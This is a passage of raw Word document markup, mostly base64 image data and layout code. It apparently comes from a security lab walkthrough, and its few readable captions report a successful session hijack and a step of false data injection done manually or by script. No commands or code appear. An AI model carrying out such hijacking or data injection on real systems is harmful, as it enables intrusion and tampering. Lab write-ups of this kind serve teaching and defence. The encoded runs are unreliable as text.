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&#10;zZ+mMuNoYDaPI9BZqv/TZ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yTJEZHBAAAlw8AAA4AAAAAAAAAAAAAAAAAPQIAAGRycy9lMm9Eb2MueG1sUEsBAi0ACgAA&#10;AAAAAAAhAO9nTJlKGAEAShgBABQAAAAAAAAAAAAAAAAAsAYAAGRycy9tZWRpYS9pbWFnZTEuanBn&#10;UEsBAi0AFAAGAAgAAAAhAH8cJuLdAAAABQEAAA8AAAAAAAAAAAAAAAAALB8BAGRycy9kb3ducmV2&#10;LnhtbFBLAQItABQABgAIAAAAIQA3ncEYugAAACEBAAAZAAAAAAAAAAAAAAAAADYgAQBkcnMvX3Jl&#10;bHMvZTJvRG9jLnhtbC5yZWxzUEsFBgAAAAAGAAYAfAEAACchAQAAAA==&#10;">
                <v:rect id="Rectangle 3351" o:spid="_x0000_s1265" style="position:absolute;left:59448;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0A0D14BA" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3352" o:spid="_x0000_s1266" style="position:absolute;top:34009;width:4617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76C9377A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>As you can see the session got hijacked successfully</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3353" o:spid="_x0000_s1267" style="position:absolute;left:34753;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730A9157" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 3354" o:spid="_x0000_s1268" style="position:absolute;top:3603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1EA967E2" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 3373" o:spid="_x0000_s1269"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bCxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba4NA&#10;FITvgf6H5RV6S9ZESBrrGkqgUAohRAteH+6rSt234m7V5tdnA4Ueh5n5hkkPs+nESINrLStYryIQ&#10;xJXVLdcKPou35TMI55E1dpZJwS85OGQPixQTbSe+0Jj7WgQIuwQVNN73iZSuasigW9meOHhfdjDo&#10;gxxqqQecAtx0chNFW2mw5bDQYE/Hhqrv/McoGPvNeY/79UdZkj5OeXmt7KlQ6ulxfn0B4Wn2/+G/&#10;9rtWEMe7GO5vwhOQ2Q0AAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAwZHbCxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;">
                  <v:imagedata r:id="rId84" o:title=""/>
                </v:shape>
                <v:shape id="Shape 3374" o:spid="_x0000_s1270"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cVxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;FITvwv6H8ARvmmrFlWqURVfxqHVh2dujebbF5qU0WVv/vREEj8PMfMMs152pxI0aV1pWMB5FIIgz&#10;q0vOFfycd8M5COeRNVaWScGdHKxXH70lJtq2fKJb6nMRIOwSVFB4XydSuqwgg25ka+LgXWxj0AfZ&#10;5FI32Aa4qeQkimbSYMlhocCaNgVl1/TfKPhuJ7/+77i/zscXq+tpvuX4eFZq0O++FiA8df4dfrUP&#10;WkEcf07h+SY8Abl6AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAEoOdxXEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="511E8A0D"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09440" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1BF7106C" wp14:editId="703DCC42">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="41405" name="Group 41405"/>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60" name="Shape 498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61" name="Shape 498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62" name="Shape 498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63" name="Shape 498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64" name="Shape 498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05" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49865" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49866" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49867" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49868" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4986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0464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0DD1F5B1" wp14:editId="4ACB4890">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="41407" name="Group 4140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70" name="Shape 498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71" name="Shape 498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72" name="Shape 498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73" name="Shape 498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74" name="Shape 498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07" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49875" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49876" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49877" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49878" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 498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Step 13: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">We can also do false data Injection here manually or by running a script </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA2ECC4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="24"/>
        <w:ind w:right="-185"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73AB9E2B" wp14:editId="19DFBA01">
                <wp:extent cx="5986882" cy="3761715"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="41404" name="Group 41404"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5986882" cy="3761715"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5986882" cy="3761715"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="3361" name="Rectangle 3361"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="661E57B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362" name="Rectangle 3362"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="202692"/>
                            <a:ext cx="2014961" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="64C91B98" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>Doing the manual Part</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="3363" name="Rectangle 3363"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1515186" y="202692"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="05FD049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364" name="Rectangle 3364"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5944820" y="3612515"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="409EC2C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3376" name="Picture 3376"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId85"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="38303" y="389082"/>
                            <a:ext cx="5873750" cy="3303905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="3377" name="Shape 3377"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="25603" y="376382"/>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AB9E2B" id="Group 41404" o:spid="_x0000_s1271" style="width:471.4pt;height:296.2pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59868,3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m5dDTQQAAJUPAAAOAAAAZHJzL2Uyb0RvYy54bWzkV9tu2zgQfV9g&#10;/0HQe2NdLFsS4hSLZhsUWGyDtvsBNE1ZQimSIOnbfv3OkKLsxO7WSIHmoQ0qU+TMcObMUDxz+3bf&#10;82jLtOmkWMTpTRJHTFC56sR6Ef/z5f2bMo6MJWJFuBRsER+Yid/e/f7b7U7VLJOt5CumIzAiTL1T&#10;i7i1VtWTiaEt64m5kYoJWGyk7omFV72erDTZgfWeT7IkmU12Uq+UlpQZA7P3fjG+c/abhlH7sWkM&#10;sxFfxOCbdU/tnkt8Tu5uSb3WRLUdHdwgL/CiJ52ATUdT98SSaKO7M1N9R7U0srE3VPYT2TQdZS4G&#10;iCZNnkXzoOVGuVjW9W6tRpgA2mc4vdgs/Xv7oNVn9agBiZ1aAxbuDWPZN7rHX/Ay2jvIDiNkbG8j&#10;CpNFVc7KMosjCmv5fJbO08KDSltA/kyPtn9+R3MSNp48cWenoEDMEQPzYxh8boliDlpTAwaPOupW&#10;EEA+S+NIkB4q9RPUDhFrziI36+BxsiNYpjaA29VIFUUOhwFxSqtyms8QpjFYUitt7AOTfYSDRaxh&#10;e1dRZPuXsV40iOCWXOBTyPcd534VZwCz4BWO7H65d4GlqdsO55ZydYBwW6n//QgHt+Fyt4jlMIrx&#10;LMPuuBpH/IMAmPHYhIEOg2UYaMvfSXe4vD9/bKxsOufwcbfBMcgfFtnPSSTU5IVEZog6ugBJvzaR&#10;WZLNKqdI6lD3cFqnFRbLa+VzHgL5VfKZX8xnHmC4Kp9pAX/lLI7gEF7KalFUU9jntXJahmB+lZxO&#10;L+Z0GmC4KqeQsmmZwUcKL6BZmkGKUf94VF85qVWI5rWTqjpaw/+BRcDo7Ab9PtsCLbvRLB6M9FfZ&#10;6In+ulFvgPAoYrtlxzt7cOQN7jd0SmwfO4oXKb6cXsZzOKn+Gw4CuC9cxTAH2Q2SqIe3H74/MbPk&#10;ncKrEQsBx4PDwPyeMacLMXtWdi/ppmfCepqpGQffpTBtp0wc6Zr1SwaMQX9Ypb7cjNXM0hY3bGBj&#10;pA/oGanHBefl0TH0+RsEIi/zBL5DWNFllQC9elrQ5TyfF1DxjnOBZJW4kn8pmXB+eU/cEBz7adf0&#10;fB5S7BgZJni82a46/lkxC1DNZ/k5VFWVHqHKqvwMKrrxvAsTF7gW8PiVZ10w14YR3YswRHb2vy0F&#10;VDrqoVEcRsCxinLwpUWi6V3B9R7I1xfpJO2RLwcJX0NHGS5OZUebWCqDTa8R5MKvcrZP5V3zAzUT&#10;JMKvl/Qf1OcylEvD/AYYlqvvMVSwdQomFxh1VkwTLFUCzV0DZ8hxWuhrxCr4OZBDX4BIzYw9cIZ4&#10;cPGJNcBfoc9InZ7R6+U7rqMtQcbp/uHRcEGAKOr4szdoJd/UQlHCVUsGW4OZYQNncrCEksx1kqMz&#10;g1k6eOPbSWjKIM7QVIJLo5JzSwo76gtohd2GJ9Hi0N8QGBC+ObbsmiDo/ZxHQ5+KzeXpu5M/dtN3&#10;/wEAAP//AwBQSwMECgAAAAAAAAAhANOpBuOyLwEAsi8BABQAAABkcnMvbWVkaWEvaW1hZ2UxLmpw&#10;Z//Y/+AAEEpGSUYAAQEBAGAAYAAA/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwL&#10;CgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQU&#10;FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU/8AAEQgCHgP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B&#10;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